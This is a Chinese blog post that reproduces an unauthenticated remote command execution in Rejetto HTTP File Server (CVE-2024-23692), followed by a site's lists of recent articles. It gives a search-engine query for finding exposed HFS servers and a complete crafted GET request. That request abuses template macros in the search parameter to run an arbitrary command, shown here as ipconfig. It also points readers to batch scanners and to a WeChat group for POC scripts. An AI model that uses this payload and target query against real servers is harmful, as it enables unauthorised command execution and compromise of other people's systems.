【漏洞复现】Rejetto HTTP文件服务器 未授权RCE漏洞(CVE-2024-23692)

0x01 产品简介

Rejetto HTTP File Server(HFS)是一个基于HTTP协议的文件服务器软件,旨在为用户提供简单、轻量级且易于使用的文件共享解决方案。功能强大、易于使用的文件服务器软件,无论是个人使用还是团队协作,HFS都能满足用户的需求,提高工作效率。

0x02 漏洞概述

Rejeto HTTP File Server 2.3m及之前版本存在安全漏洞,该漏洞源于存在模板注入漏洞。 成功利用这一漏洞的攻击者可以进行远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。

0x03 搜索语法

app="HFS"

在这里插入图片描述

0x04 漏洞复现

GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

相关推荐

最近更新

  1. TCP协议是安全的吗?

    2024-06-15 07:42:02       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-06-15 07:42:02       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-06-15 07:42:02       18 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-06-15 07:42:02       20 阅读

热门阅读

  1. IDEA GIt 提交提示 “Contents are identica“

    2024-06-15 07:42:02       8 阅读
  2. 记录自己一直以来存在的问题:声音太小

    2024-06-15 07:42:02       10 阅读
  3. Python基础总结之enumerate介绍使用

    2024-06-15 07:42:02       8 阅读
  4. docker 拉取镜像拉取超时的解决方法

    2024-06-15 07:42:02       11 阅读
  5. 分布式管理

    2024-06-15 07:42:02       6 阅读
  6. 力扣23. 合并k个升序链表

    2024-06-15 07:42:02       6 阅读
  7. 数据分析------统计学知识点(五)

    2024-06-15 07:42:02       8 阅读
  8. 甲辰年五月初九夏风思

    2024-06-15 07:42:02       4 阅读
  9. Scala的字符串插值

    2024-06-15 07:42:02       6 阅读
  10. 算法刷题笔记 区间合并(C++实现)

    2024-06-15 07:42:02       7 阅读
  11. React小记(一)_基础部分

    2024-06-15 07:42:02       6 阅读